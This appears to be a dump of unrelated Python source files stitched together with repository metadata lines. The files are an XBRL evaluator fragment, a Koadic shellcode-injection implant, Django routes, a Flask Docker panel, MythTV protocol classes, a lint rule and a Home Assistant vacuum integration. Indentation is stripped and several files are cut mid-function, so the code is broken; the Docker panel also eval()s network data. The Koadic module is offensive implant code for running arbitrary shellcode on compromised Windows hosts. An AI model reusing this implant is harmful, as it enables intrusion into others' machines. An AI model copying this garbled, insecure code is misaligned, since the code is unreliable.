# set next value here as well as in for node, because may be cleared above context of for node
self.sCtx.localVariables[self.node.name] = self.yieldedValue
if self.sCtx.formulaOptions.traceVariableFiltersResult:
self.sCtx.modelXbrl.info("sphinx:trace",
_("For loop %(variable)s: bound value %(result)s"),
sourceFileLine=self.node.sourceFileLine, variable=str(self.node.name), result=str(self.yieldedValue))
except StopIteration:
if self.yieldedValue is not None:
del self.sCtx.localVariables[self.node.name]
self.yieldedValue = None
raise StopIteration
from .cdrEvaluator import evaluate, factAspectValue, CdrException, NONE
| apache-2.0 | -6,810,582,852,387,637,000 | 48.5323 | 156 | 0.608952 | false |
zerosum0x0/koadic | modules/implant/inject/shellcode_dynwrapx.py | 1 | 2827 | import core.implant
import core.job
import string
import uuid
class DynWrapXShellcodeJob(core.job.Job):
def create(self):
self.fork32Bit = True
self.options.set("DLLUUID", uuid.uuid4().hex)
self.options.set("MANIFESTUUID", uuid.uuid4().hex)
self.options.set("SHELLCODEDECCSV", self.convert_shellcode(shellcode))
self.options.set("DIRECTORY", self.options.get('DIRECTORY').replace("\\", "\\\\").replace('"', '\\"'))
def report(self, handler, data, sanitize = False):
task = handler.get_header(self.options.get("UUIDHEADER"), False)
if task == self.options.get("DLLUUID"):
handler.send_file(self.options.get("DYNWRAPXDLL"))
return
if task == self.options.get("MANIFESTUUID"):
handler.send_file(self.options.get("DYNWRAPXMANIFEST"))
return
super(DynWrapXShellcodeJob, self).report(handler, data)
def done(self):
self.results = "Cpmpleted"
self.display()
def display(self):
pass
#self.shell.print_plain(str(self.errno))
class DynWrapXShellcodeImplant(core.implant.Implant):
NAME = "Shellcode via Dynamic Wrapper X"
DESCRIPTION = "Executes arbitrary shellcode using the Dynamic Wrapper X COM object"
AUTHORS = ["zerosum0x0"]
STATE = "implant/inject/shellcode_dynwrapx"
def load(self):
self.options.register("DIRECTORY", "%TEMP%", "writeable directory on zombie", required=False)
self.options.register("SHELLCODE", "90c3", "in ASCII hex format (e.g.: 31c0c3)", required=True)
self.options.register("SHELLCODEDECCSV", "", "decimal CSV shellcode", hidden=True)
self.options.register("DYNWRAPXDLL", "data/bin/dynwrapx.dll", "relative path to dynwrapx.dll", required=True, advanced=True)
self.options.register("DYNWRAPXMANIFEST", "data/bin/dynwrapx.manifest", "relative path to dynwrapx.manifest", required=True, advanced=True)
self.options.register("UUIDHEADER", "ETag", "HTTP header for UUID", advanced=True)
self.options.register("DLLUUID", "ETag", "HTTP header for UUID", hidden=True)
self.options.register("MANIFESTUUID", "ETag", "HTTP header for UUID", hidden=True)
def job(self):
return DynWrapXShellcodeJob
def run(self):
shellcode = self.options.get("SHELLCODE")
if not self.validate_shellcode(shellcode):
self.shell.print_error("SHELLCODE option is an invalid hex string.")
return
#vba = self.loader.load_script("data/implant/inject/shellcode.vba", self.options)
#vba = vba.decode().replace("\n", "\\n")
#self.options.set("VBACODE", vba)
workloads = {}
workloads["js"] = "data/implant/inject/shellcode_dynwrapx.js"
self.dispatch(workloads, self.job)
| apache-2.0 | 7,122,812,421,590,287,000 | 37.202703 | 147 | 0.655111 | false |
pavlovicv/iorem | config/urls.py | 1 | 1275 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
from django.views.generic import TemplateView
from django.views import defaults as default_views
urlpatterns = [
url(r'^$', TemplateView.as_view(template_name='pages/home.html'), name="home"),
url(r'^about/$', TemplateView.as_view(template_name='pages/about.html'), name="about"),
# Django Admin, use {% url 'admin:index' %}
url(settings.ADMIN_URL, include(admin.site.urls)),
# User management
url(r'^users/', include("iorem.users.urls", namespace="users")),
url(r'^accounts/', include('allauth.urls')),
# Your stuff: custom urls includes go here
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
if settings.DEBUG:
    # This allows the error pages to be debugged during development; just visit
    # these urls in a browser to see what these error pages look like.
urlpatterns += [
url(r'^400/$', default_views.bad_request),
url(r'^403/$', default_views.permission_denied),
url(r'^404/$', default_views.page_not_found),
url(r'^500/$', default_views.server_error),
]
| bsd-3-clause | 1,826,147,253,955,634,000 | 35.428571 | 91 | 0.687059 | false |
0mu-Project/Gensokyo-Server-Platform | Yakumo/Yakumo-Instance/muMDAU_app/docker.py | 1 | 2456 | # -*- coding: utf-8 -*-
# muMDAU_app main / first page
from muMDAU_app import app, socketio
from threading import Thread
from flask import render_template, url_for, redirect, session, request
from docker import Client
pullthread = None
# index page main route page
@app.route('/project')
def pview():
return render_template('project.html')
@app.route('/docker')
def dockerview():
if 'username' in session:
cli = Client(base_url='tcp://'+ session['username'] +'.docker:14438')
c = cli.containers(all=True)
images = cli.images()
return render_template('docker.html', **locals())
else:
return redirect(url_for('main.index'))
@app.route('/docker/run')
def run():
if 'username' in session:
clir = Client(base_url='tcp://'+ session['username'] +'.docker:14438')
clirt = clir.create_container(tty=True, detach=True, image='0muproject/0mu-flask', name='0mu-Flask-06', ports=['8510', '22'], host_config=clir.create_host_config(port_bindings={8510: 8510, 22: 2222}))
clir.start(clirt.get('Id'))
return redirect(url_for('dockerview'))
else:
return redirect(url_for('main.index'))
@app.route('/docker/stop/<Name>')
def dockerstop(Name):
if 'username' in session:
cli = Client(base_url='tcp://172.17.0.2:14458')
cli.stop(container=Name)
return redirect(url_for('dockerview'))
else:
return redirect(url_for('main.index'))
@app.route('/docker/start/<Name>')
def dockerstart(Name):
if 'username' in session:
return redirect(url_for('dockerview'))
else:
return redirect(url_for('main.index'))
@app.route('/docker/pull/<Name>', methods=['GET', 'POST'])
def dockerpull(Name):
if request.method == 'POST':
global pullthread
if 'username' in session:
            pullthread = Thread(target=pull_connect, args=(Name,))
pullthread.daemon = True
pullthread.start()
            return 'Starting pull'
else:
return redirect(url_for('main.index'))
def pull_connect(Name):
cli = Client(base_url='tcp://172.17.0.2:14458')
for line in cli.pull(Name, stream=True):
socketio.emit('pull', {'info': eval(line.decode('utf-8')).get('status') + '</br>' +str(eval(line.decode('utf-8')).get('progress',''))}, namespace='/pull/info')
socketio.emit('pull', {'info': "[Pull-Done] 請重新整理 Hakurei-Docker 界面"}, namespace='/pull/info')
| gpl-3.0 | 3,742,627,619,181,106,700 | 35.878788 | 208 | 0.628595 | false |
bast/gitink | gitink/color.py | 1 | 1192 | def whiter_shade_of_pale(hex_color):
'''
This function pales the color a bit for the interior
of the boxes.
'''
pale_shift = 70
# separate the red, green, blue parts
r_hex = hex_color[1:3]
g_hex = hex_color[3:5]
b_hex = hex_color[5:7]
# convert from hex to dec
r_dec = int(r_hex, 16)
g_dec = int(g_hex, 16)
b_dec = int(b_hex, 16)
# make the color paler but make sure we do not go
# beyond 255 or ff
r_dec = min(255, r_dec + pale_shift)
g_dec = min(255, g_dec + pale_shift)
b_dec = min(255, b_dec + pale_shift)
# convert from dec to hex
r_hex = format(r_dec, '02x')
g_hex = format(g_dec, '02x')
b_hex = format(b_dec, '02x')
# stitch them again together
return '#{0}{1}{2}'.format(r_hex, g_hex, b_hex)
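    # Quick sanity check of the shift above (computed from this function, not
    # part of gitink's documented behaviour): whiter_shade_of_pale('#4C72B0')
    # yields '#92b8f6' -- each channel raised by 70 and capped at 255.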
def get_color(text):
# this is the deep palette of https://seaborn.pydata.org/
palette = ['#4C72B0',
'#55A868',
'#C44E52',
'#8172B2',
'#CCB974',
'#64B5CD']
position = ord(text[0]) % len(palette)
color = palette[position]
pale_color = whiter_shade_of_pale(color)
return color, pale_color
| mpl-2.0 | 8,822,537,647,600,122,000 | 24.361702 | 61 | 0.551174 | false |
analogue/mythbox | resources/src/mythbox/mythtv/protocol.py | 1 | 13858 | #
# MythBox for XBMC - http://mythbox.googlecode.com
# Copyright (C) 2012 [email protected]
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
from mythbox.mythtv.enums import TVState, TVState44, TVState58
# MythTV Protocol Constants
initVersion = 8
initToken = ''
separator = u'[]:[]'
serverVersion = None
class ProtocolException(Exception):
'''
    Thrown on protocol version mismatch between frontend and backend or
general protocol related errors.
'''
pass
class BaseProtocol(object):
def recordSize(self):
return len(self.recordFields())
def emptyRecordFields(self):
return ['episode','inetref','season']
def protocolToken(self):
return ""
class Protocol40(BaseProtocol):
def version(self):
return 40
def mythVersion(self):
return '0.21'
def recordFields(self):
# Based on from https://github.com/MythTV/mythtv/blob/v0.23.1/mythtv/bindings/python/MythTV/MythData.py
return [ 'title', 'subtitle', 'description',
'category', 'chanid', 'channum',
'callsign', 'channame', 'filename',
'fs_high', 'fs_low', 'starttime',
'endtime', 'duplicate', 'shareable',
'findid', 'hostname', 'sourceid',
'cardid', 'inputid', 'recpriority',
'recstatus', 'recordid', 'rectype',
'dupin', 'dupmethod', 'recstartts',
'recendts', 'repeat', 'programflags',
'recgroup', 'commfree', 'outputfilters',
'seriesid', 'programid', 'lastmodified',
'stars', 'airdate', 'hasairdate',
'playgroup', 'recpriority2', 'parentid',
'storagegroup', 'audio_props', 'video_props',
'subtitle_type']
def hasOriginalAirDate(self, program):
return int(program._data['hasairdate']) == 1
def tvState(self):
return TVState
def buildAnnounceFileTransferCommand(self, hostname, filePath):
return ["ANN FileTransfer %s" % hostname, filePath]
def buildRescheduleRequest(self, scheduleId):
return ['RESCHEDULE_RECORDINGS %s' % scheduleId]
def getLiveTvBrain(self, settings, translator):
from mythbox.ui.livetv import MythLiveTvBrain
return MythLiveTvBrain(settings, translator)
def getFileSize(self, program):
return self.decodeLongLong(int(program._data['fs_low']), int(program._data['fs_high'])) / 1024.0
def genPixMapCommand(self):
return ['QUERY_GENPIXMAP']
def genQueryRecordingsCommand(self):
return ['QUERY_RECORDINGS Play']
def genPixMapPreviewFilename(self, program):
return program.getBareFilename() + '.640x360.png'
def supportsStreaming(self, platform):
return True
def readLong(self, reply, remove=False):
d = self.decodeLongLong(int(reply[1]), int(reply[0]))
if remove:
reply.pop(0)
reply.pop(0)
return d
def writeLong(self, d, request):
low, high = self.encodeLongLong(d)
request.append('%d' % high)
request.append('%d' % low)
def decodeLongLong(self, low32Bits, high32Bits):
"""
@type low32Bits: int or str
@type high32Bits: int or str
@return: Decodes two 32bit ints to a 64bit long
@rtype: long
"""
if isinstance(low32Bits, basestring):
low32Bits = long(low32Bits)
if isinstance(high32Bits, basestring):
high32Bits = long(high32Bits)
return low32Bits & 0xffffffffL | (high32Bits << 32)
def encodeLongLong(self, long64Bits):
"""
@rtype: (low32Bits, high32Bits)
@return: Encodes 64bit long into pair of 32 bit ints
"""
return long64Bits & 0xffffffffL, long64Bits >> 32
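        # Illustrative round trip (made-up value, not from the protocol spec):
        # a 5 GiB size of 5368709120 bytes encodes as (low, high) == (1073741824, 1),
        # and decodeLongLong(1073741824, 1) == 5368709120.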
class Protocol41(Protocol40):
def version(self):
return 41
class Protocol42(Protocol41):
def version(self):
return 42
class Protocol43(Protocol42):
def version(self):
return 43
def recordFields(self):
# Copied from https://github.com/MythTV/mythtv/blob/v0.23.1/mythtv/bindings/python/MythTV/MythData.py
return [ 'title', 'subtitle', 'description',
'category', 'chanid', 'channum',
'callsign', 'channame', 'filename',
'fs_high', 'fs_low', 'starttime',
'endtime', 'duplicate', 'shareable',
'findid', 'hostname', 'sourceid',
'cardid', 'inputid', 'recpriority',
'recstatus', 'recordid', 'rectype',
'dupin', 'dupmethod', 'recstartts',
'recendts', 'repeat', 'programflags',
'recgroup', 'commfree', 'outputfilters',
'seriesid', 'programid', 'lastmodified',
'stars', 'airdate', 'hasairdate',
'playgroup', 'recpriority2', 'parentid',
'storagegroup', 'audio_props', 'video_props',
'subtitle_type','year']
class Protocol44(Protocol43):
def version(self):
return 44
def tvState(self):
return TVState44
class Protocol45(Protocol44):
def version(self):
return 45
def buildAnnounceFileTransferCommand(self, hostname, filePath):
# TODO: Storage group should be non-empty for recordings
storageGroup = ''
return ['ANN FileTransfer %s' % hostname, filePath, storageGroup]
class Protocol46(Protocol45):
def version(self):
return 46
class Protocol47(Protocol46):
def version(self):
return 47
class Protocol48(Protocol47):
def version(self):
return 48
class Protocol49(Protocol48):
def version(self):
return 49
class Protocol50(Protocol49):
def version(self):
return 50
def mythVersion(self):
return '0.22'
class Protocol56(Protocol50):
def version(self):
return 56
def mythVersion(self):
return '0.23'
class Protocol23056(Protocol56):
def version(self):
return 23056
def mythVersion(self):
return '0.23.1'
class Protocol57(Protocol56):
def version(self):
return 57
def mythVersion(self):
return '0.24'
    def recordFields(self):
return ['title','subtitle','description',
'category','chanid','channum',
'callsign','channame','filename',
'filesize','starttime','endtime',
'findid','hostname','sourceid',
'cardid','inputid','recpriority',
'recstatus','recordid','rectype',
'dupin','dupmethod','recstartts',
'recendts','programflags','recgroup',
'outputfilters','seriesid','programid',
'lastmodified','stars','airdate',
'playgroup','recpriority2','parentid',
'storagegroup','audio_props','video_props',
'subtitle_type','year']
def hasOriginalAirDate(self, program):
d = program.originalAirDate()
return d and '-' in d
def buildAnnounceFileTransferCommand(self, hostname, filePath):
return ["ANN FileTransfer %s 0" % hostname, filePath, 'Default']
def getFileSize(self, program):
return int(program._data['filesize']) / 1024.0
def supportsStreaming(self, platform):
# Eden and up
return platform.xbmcVersion() >= 11.0
class Protocol58(Protocol57):
def tvState(self):
return TVState58
def version(self):
return 58
class Protocol59(Protocol58):
def version(self):
return 59
class Protocol60(Protocol59):
def version(self):
return 60
def buildAnnounceFileTransferCommand(self, hostname, filePath):
return ["ANN FileTransfer %s 0 1 10000" % hostname, filePath, 'Default']
def genPixMapCommand(self):
return ['QUERY_GENPIXMAP2', 'do_not_care']
def genPixMapPreviewFilename(self, program):
return '<EMPTY>'
class Protocol61(Protocol60):
def version(self):
return 61
class Protocol62(Protocol61):
def version(self):
return 62
def protocolToken(self):
return "78B5631E"
class Protocol63(Protocol62):
def version(self):
return 63
def protocolToken(self):
return "3875641D"
class Protocol64(Protocol63):
def version(self):
return 64
def protocolToken(self):
return "8675309J"
class Protocol65(Protocol64):
def version(self):
return 65
def protocolToken(self):
return "D2BB94C2"
def genQueryRecordingsCommand(self):
# technically the old query recs command works but actually causes sorting which would be redundant and may be removed in the future
return ['QUERY_RECORDINGS Unsorted']
class Protocol66(Protocol65):
def version(self):
return 66
def protocolToken(self):
return "0C0FFEE0"
def readLong(self, reply, remove=False):
d = long(reply[0])
if remove:
reply.pop(0)
return d
def writeLong(self, d, request):
request.append('%d' % long(d))
class Protocol67(Protocol66):
def version(self):
return 67
def protocolToken(self):
return "0G0G0G0"
def recordFields(self):
# Copied from mythtv/mythtv/bindings/python/MythTV/mythproto.py
return ['title', 'subtitle', 'description',
'season', 'episode', 'category',
'chanid', 'channum', 'callsign',
'channame', 'filename', 'filesize',
'starttime', 'endtime', 'findid',
'hostname', 'sourceid', 'cardid',
'inputid', 'recpriority', 'recstatus',
'recordid', 'rectype', 'dupin',
'dupmethod', 'recstartts', 'recendts',
'programflags', 'recgroup', 'outputfilters',
'seriesid', 'programid', 'inetref',
'lastmodified', 'stars', 'airdate',
'playgroup', 'recpriority2', 'parentid',
'storagegroup', 'audio_props', 'video_props',
'subtitle_type','year']
class Protocol68(Protocol67):
def version(self):
return 68
def protocolToken(self):
return "90094EAD"
class Protocol69(Protocol68):
def version(self):
return 69
def protocolToken(self):
return "63835135"
class Protocol70(Protocol69):
def version(self):
return 70
def protocolToken(self):
return "53153836"
class Protocol71(Protocol70):
def version(self):
return 71
def protocolToken(self):
return "05e82186"
class Protocol72(Protocol71):
def version(self):
return 72
def protocolToken(self):
return "D78EFD6F"
class Protocol73(Protocol72):
def version(self):
return 73
def protocolToken(self):
return "D7FE8D6F"
def buildRescheduleRequest(self, scheduleId):
if scheduleId == 0:
return ['RESCHEDULE_RECORDINGS CHECK 0 0 0 MythBoxFrontend **any**']
else:
if scheduleId == -1:
scheduleId = 0
return ['RESCHEDULE_RECORDINGS MATCH %s 0 0 - MythBoxFrontend' % scheduleId]
class Protocol74(Protocol73):
def version(self):
return 74
def protocolToken(self):
return "SingingPotato"
# Current rev in mythversion.h
protocols = {
40: Protocol40(), # 0.21
41: Protocol41(),
42: Protocol42(),
43: Protocol43(),
44: Protocol44(),
45: Protocol45(),
46: Protocol46(),
47: Protocol47(),
48: Protocol48(),
49: Protocol49(),
50: Protocol50(), # 0.22
56: Protocol56(), # 0.23
23056: Protocol23056(), # 0.23.1 - mythbuntu weirdness
57: Protocol57(), # 0.24
58: Protocol58(), # 0.24
59: Protocol59(), # 0.24
60: Protocol60(), # 0.24
61: Protocol61(), # 0.24
62: Protocol62(), # 0.24
63: Protocol63(), # 0.24
64: Protocol64(), # 0.25
65: Protocol65(), # 0.25
66: Protocol66(), # 0.25
67: Protocol67(), # 0.25
68: Protocol68(), # 0.25 - VIDEO_LIST_UPDATE
69: Protocol69(), # 0.25 - QUERY_FILE_HASH
70: Protocol70(), # 0.25 - REOPEN
71: Protocol71(), # 0.25 - ASK_RECORDING GET_FREE_INPUTS
72: Protocol72(), # 0.25 - QUERY_ACTIVE_BACKENDS
73: Protocol73(), # 0.26 - RESCHEDULE_RECORDINGS
74: Protocol74() # 0.26
}
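# Assumed usage elsewhere in MythBox (not shown in this module): once the
# backend announces its protocol version, the matching implementation is
# looked up from this map, e.g. protocols.get(66), and its recordFields(),
# readLong(), etc. drive parsing of backend replies.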
| gpl-2.0 | -5,766,141,552,974,468,000 | 26.119374 | 140 | 0.571655 | false |
jffm/pyanalyzer | core/rule.py | 1 | 2373 | # Copyright (c) 2008-2009 Junior (Frederic) FLEURIAL MONFILS
#
# This file is part of PyAnalyzer.
#
# PyAnalyzer is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# or see <http://www.opensource.org/licenses/gpl-3.0.html>
#
# Contact:
# Junior FLEURIAL MONFILS <frederic dot fleurialmonfils at cetic dot be>
__author__ = "Frederic F. MONFILS"
__version__ = "$Revision: $".split()[1]
__revision__ = __version__
# $Source: $
__date__ = "$Date: $"
__copyright__ = "Copyright (c) 2008-2009 Junior (Frederic) FLEURIAL MONFILS"
__license__ = "GPLv3"
__contact__ = "ffm at cetic.be"
"""This module implements a Rule
"""
import sys
import compiler
from core.metric import Metric
from core.writer.sqlwriter import SqlWriter
from core.writer.textwriter import TextWriter
class Rule(Metric):
"""A Rule is a Metric that is directly printed to stderr
"""
class config:
severity = None
code = 0
message = None
def __init__(self, writer):
self.writer = writer
self.row = dict(
(key,value)
for (key,value) in self.config.__dict__.items()
if not key.startswith("__"))
self.row.update(
code="%s%04d" % (self.config.severity[0].upper(), self.config.code),
message=self.__doc__.split("\n")[0]
)
def report(self, node, mapping):
self.row.update(
kind=node.__class__.__name__,
filename=self.filename,
name=getattr(node, "name", ""),
lineno=node.lineno,
message=self.row["message"] % mapping)
self.writer.writerow(self.row)
def visitModule(self, node, *args):
self.filename = node.filename
self.default(node, *args)
| gpl-3.0 | -3,664,105,495,476,861,400 | 33.41791 | 80 | 0.626633 | false |
leppa/home-assistant | homeassistant/components/xiaomi_miio/vacuum.py | 1 | 15770 | """Support for the Xiaomi vacuum cleaner robot."""
import asyncio
from functools import partial
import logging
from miio import DeviceException, Vacuum # pylint: disable=import-error
import voluptuous as vol
from homeassistant.components.vacuum import (
ATTR_CLEANED_AREA,
PLATFORM_SCHEMA,
STATE_CLEANING,
STATE_DOCKED,
STATE_ERROR,
STATE_IDLE,
STATE_PAUSED,
STATE_RETURNING,
SUPPORT_BATTERY,
SUPPORT_CLEAN_SPOT,
SUPPORT_FAN_SPEED,
SUPPORT_LOCATE,
SUPPORT_PAUSE,
SUPPORT_RETURN_HOME,
SUPPORT_SEND_COMMAND,
SUPPORT_START,
SUPPORT_STATE,
SUPPORT_STOP,
StateVacuumDevice,
)
from homeassistant.const import (
ATTR_ENTITY_ID,
CONF_HOST,
CONF_NAME,
CONF_TOKEN,
STATE_OFF,
STATE_ON,
)
import homeassistant.helpers.config_validation as cv
from .const import (
DOMAIN,
SERVICE_CLEAN_ZONE,
SERVICE_MOVE_REMOTE_CONTROL,
SERVICE_MOVE_REMOTE_CONTROL_STEP,
SERVICE_START_REMOTE_CONTROL,
SERVICE_STOP_REMOTE_CONTROL,
)
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = "Xiaomi Vacuum cleaner"
DATA_KEY = "vacuum.xiaomi_miio"
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_TOKEN): vol.All(str, vol.Length(min=32, max=32)),
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
},
extra=vol.ALLOW_EXTRA,
)
FAN_SPEEDS = {"Quiet": 38, "Balanced": 60, "Turbo": 77, "Max": 90, "Gentle": 105}
ATTR_CLEAN_START = "clean_start"
ATTR_CLEAN_STOP = "clean_stop"
ATTR_CLEANING_TIME = "cleaning_time"
ATTR_DO_NOT_DISTURB = "do_not_disturb"
ATTR_DO_NOT_DISTURB_START = "do_not_disturb_start"
ATTR_DO_NOT_DISTURB_END = "do_not_disturb_end"
ATTR_MAIN_BRUSH_LEFT = "main_brush_left"
ATTR_SIDE_BRUSH_LEFT = "side_brush_left"
ATTR_FILTER_LEFT = "filter_left"
ATTR_SENSOR_DIRTY_LEFT = "sensor_dirty_left"
ATTR_CLEANING_COUNT = "cleaning_count"
ATTR_CLEANED_TOTAL_AREA = "total_cleaned_area"
ATTR_CLEANING_TOTAL_TIME = "total_cleaning_time"
ATTR_ERROR = "error"
ATTR_RC_DURATION = "duration"
ATTR_RC_ROTATION = "rotation"
ATTR_RC_VELOCITY = "velocity"
ATTR_STATUS = "status"
ATTR_ZONE_ARRAY = "zone"
ATTR_ZONE_REPEATER = "repeats"
VACUUM_SERVICE_SCHEMA = vol.Schema({vol.Optional(ATTR_ENTITY_ID): cv.comp_entity_ids})
SERVICE_SCHEMA_REMOTE_CONTROL = VACUUM_SERVICE_SCHEMA.extend(
{
vol.Optional(ATTR_RC_VELOCITY): vol.All(
vol.Coerce(float), vol.Clamp(min=-0.29, max=0.29)
),
vol.Optional(ATTR_RC_ROTATION): vol.All(
vol.Coerce(int), vol.Clamp(min=-179, max=179)
),
vol.Optional(ATTR_RC_DURATION): cv.positive_int,
}
)
SERVICE_SCHEMA_CLEAN_ZONE = VACUUM_SERVICE_SCHEMA.extend(
{
vol.Required(ATTR_ZONE_ARRAY): vol.All(
list,
[
vol.ExactSequence(
[vol.Coerce(int), vol.Coerce(int), vol.Coerce(int), vol.Coerce(int)]
)
],
),
vol.Required(ATTR_ZONE_REPEATER): vol.All(
vol.Coerce(int), vol.Clamp(min=1, max=3)
),
}
)
SERVICE_TO_METHOD = {
SERVICE_START_REMOTE_CONTROL: {"method": "async_remote_control_start"},
SERVICE_STOP_REMOTE_CONTROL: {"method": "async_remote_control_stop"},
SERVICE_MOVE_REMOTE_CONTROL: {
"method": "async_remote_control_move",
"schema": SERVICE_SCHEMA_REMOTE_CONTROL,
},
SERVICE_MOVE_REMOTE_CONTROL_STEP: {
"method": "async_remote_control_move_step",
"schema": SERVICE_SCHEMA_REMOTE_CONTROL,
},
SERVICE_CLEAN_ZONE: {
"method": "async_clean_zone",
"schema": SERVICE_SCHEMA_CLEAN_ZONE,
},
}
SUPPORT_XIAOMI = (
SUPPORT_STATE
| SUPPORT_PAUSE
| SUPPORT_STOP
| SUPPORT_RETURN_HOME
| SUPPORT_FAN_SPEED
| SUPPORT_SEND_COMMAND
| SUPPORT_LOCATE
| SUPPORT_BATTERY
| SUPPORT_CLEAN_SPOT
| SUPPORT_START
)
STATE_CODE_TO_STATE = {
2: STATE_IDLE,
3: STATE_IDLE,
5: STATE_CLEANING,
6: STATE_RETURNING,
7: STATE_CLEANING,
8: STATE_DOCKED,
9: STATE_ERROR,
10: STATE_PAUSED,
11: STATE_CLEANING,
12: STATE_ERROR,
15: STATE_RETURNING,
16: STATE_CLEANING,
17: STATE_CLEANING,
18: STATE_CLEANING,
}
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Set up the Xiaomi vacuum cleaner robot platform."""
if DATA_KEY not in hass.data:
hass.data[DATA_KEY] = {}
host = config[CONF_HOST]
token = config[CONF_TOKEN]
name = config[CONF_NAME]
# Create handler
_LOGGER.info("Initializing with host %s (token %s...)", host, token[:5])
vacuum = Vacuum(host, token)
mirobo = MiroboVacuum(name, vacuum)
hass.data[DATA_KEY][host] = mirobo
async_add_entities([mirobo], update_before_add=True)
async def async_service_handler(service):
"""Map services to methods on MiroboVacuum."""
method = SERVICE_TO_METHOD.get(service.service)
params = {
key: value for key, value in service.data.items() if key != ATTR_ENTITY_ID
}
entity_ids = service.data.get(ATTR_ENTITY_ID)
if entity_ids:
target_vacuums = [
vac
for vac in hass.data[DATA_KEY].values()
if vac.entity_id in entity_ids
]
else:
target_vacuums = hass.data[DATA_KEY].values()
update_tasks = []
for vacuum in target_vacuums:
await getattr(vacuum, method["method"])(**params)
for vacuum in target_vacuums:
update_coro = vacuum.async_update_ha_state(True)
update_tasks.append(update_coro)
if update_tasks:
await asyncio.wait(update_tasks)
for vacuum_service in SERVICE_TO_METHOD:
schema = SERVICE_TO_METHOD[vacuum_service].get("schema", VACUUM_SERVICE_SCHEMA)
hass.services.async_register(
DOMAIN, vacuum_service, async_service_handler, schema=schema
)
class MiroboVacuum(StateVacuumDevice):
"""Representation of a Xiaomi Vacuum cleaner robot."""
def __init__(self, name, vacuum):
"""Initialize the Xiaomi vacuum cleaner robot handler."""
self._name = name
self._vacuum = vacuum
self.vacuum_state = None
self._available = False
self.consumable_state = None
self.clean_history = None
self.dnd_state = None
self.last_clean = None
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def state(self):
"""Return the status of the vacuum cleaner."""
if self.vacuum_state is not None:
# The vacuum reverts back to an idle state after erroring out.
# We want to keep returning an error until it has been cleared.
if self.vacuum_state.got_error:
return STATE_ERROR
try:
return STATE_CODE_TO_STATE[int(self.vacuum_state.state_code)]
except KeyError:
_LOGGER.error(
"STATE not supported: %s, state_code: %s",
self.vacuum_state.state,
self.vacuum_state.state_code,
)
return None
@property
def battery_level(self):
"""Return the battery level of the vacuum cleaner."""
if self.vacuum_state is not None:
return self.vacuum_state.battery
@property
def fan_speed(self):
"""Return the fan speed of the vacuum cleaner."""
if self.vacuum_state is not None:
speed = self.vacuum_state.fanspeed
if speed in FAN_SPEEDS.values():
return [key for key, value in FAN_SPEEDS.items() if value == speed][0]
return speed
@property
def fan_speed_list(self):
"""Get the list of available fan speed steps of the vacuum cleaner."""
return list(sorted(FAN_SPEEDS.keys(), key=lambda s: FAN_SPEEDS[s]))
@property
def device_state_attributes(self):
"""Return the specific state attributes of this vacuum cleaner."""
attrs = {}
if self.vacuum_state is not None:
attrs.update(
{
ATTR_DO_NOT_DISTURB: STATE_ON
if self.dnd_state.enabled
else STATE_OFF,
ATTR_DO_NOT_DISTURB_START: str(self.dnd_state.start),
ATTR_DO_NOT_DISTURB_END: str(self.dnd_state.end),
# Not working --> 'Cleaning mode':
# STATE_ON if self.vacuum_state.in_cleaning else STATE_OFF,
ATTR_CLEANING_TIME: int(
self.vacuum_state.clean_time.total_seconds() / 60
),
ATTR_CLEANED_AREA: int(self.vacuum_state.clean_area),
ATTR_CLEANING_COUNT: int(self.clean_history.count),
ATTR_CLEANED_TOTAL_AREA: int(self.clean_history.total_area),
ATTR_CLEANING_TOTAL_TIME: int(
self.clean_history.total_duration.total_seconds() / 60
),
ATTR_MAIN_BRUSH_LEFT: int(
self.consumable_state.main_brush_left.total_seconds() / 3600
),
ATTR_SIDE_BRUSH_LEFT: int(
self.consumable_state.side_brush_left.total_seconds() / 3600
),
ATTR_FILTER_LEFT: int(
self.consumable_state.filter_left.total_seconds() / 3600
),
ATTR_SENSOR_DIRTY_LEFT: int(
self.consumable_state.sensor_dirty_left.total_seconds() / 3600
),
ATTR_STATUS: str(self.vacuum_state.state),
}
)
if self.last_clean:
attrs[ATTR_CLEAN_START] = self.last_clean.start
attrs[ATTR_CLEAN_STOP] = self.last_clean.end
if self.vacuum_state.got_error:
attrs[ATTR_ERROR] = self.vacuum_state.error
return attrs
@property
def available(self) -> bool:
"""Return True if entity is available."""
return self._available
@property
def supported_features(self):
"""Flag vacuum cleaner robot features that are supported."""
return SUPPORT_XIAOMI
async def _try_command(self, mask_error, func, *args, **kwargs):
"""Call a vacuum command handling error messages."""
try:
await self.hass.async_add_executor_job(partial(func, *args, **kwargs))
return True
except DeviceException as exc:
_LOGGER.error(mask_error, exc)
return False
async def async_start(self):
"""Start or resume the cleaning task."""
await self._try_command(
"Unable to start the vacuum: %s", self._vacuum.resume_or_start
)
async def async_pause(self):
"""Pause the cleaning task."""
await self._try_command("Unable to set start/pause: %s", self._vacuum.pause)
async def async_stop(self, **kwargs):
"""Stop the vacuum cleaner."""
await self._try_command("Unable to stop: %s", self._vacuum.stop)
async def async_set_fan_speed(self, fan_speed, **kwargs):
"""Set fan speed."""
if fan_speed.capitalize() in FAN_SPEEDS:
